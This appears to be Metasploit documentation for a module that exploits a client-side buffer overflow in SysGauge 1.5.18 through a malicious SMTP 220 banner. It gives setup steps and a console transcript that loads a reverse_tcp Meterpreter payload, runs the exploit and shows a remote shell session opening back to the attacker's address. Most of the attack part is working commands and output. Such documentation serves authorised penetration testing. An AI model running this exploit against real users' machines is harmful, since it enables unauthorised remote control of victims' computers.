## Vulnerable Application

  This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client, resulting in an unprivileged shell.

  The software is available for download from [SysGauge](http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe).

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
  4. Do: ```set payload windows/meterpreter/reverse_tcp```
  5. Do: ```set LHOST ip```
  6. Do: ```run```
  7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
in the program, and hit the "Verify Email ..." button.
  8. You should get a shell.

## Scenarios

  Here is how to typically execute the module. Note that the client must input this SMTP server
  information under SysGauge Options and hit the "Verify Email ..." button.

  ```
  msf > use exploit/windows/smtp/sysgauge_client_bof
  msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
  lhost => 10.0.0.1
  msf exploit(sysgauge_client_bof) > exploit
  [*] Exploit running as background job.
  msf exploit(sysgauge_client_bof) >
  [*] Started reverse TCP handler on 10.0.0.1:4444
  [*] Server started.
  [*] Client connected: 10.0.0.128
  [*] Sending payload...
  [*] Sending stage (957487 bytes) to 10.0.0.128
  [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
  ```
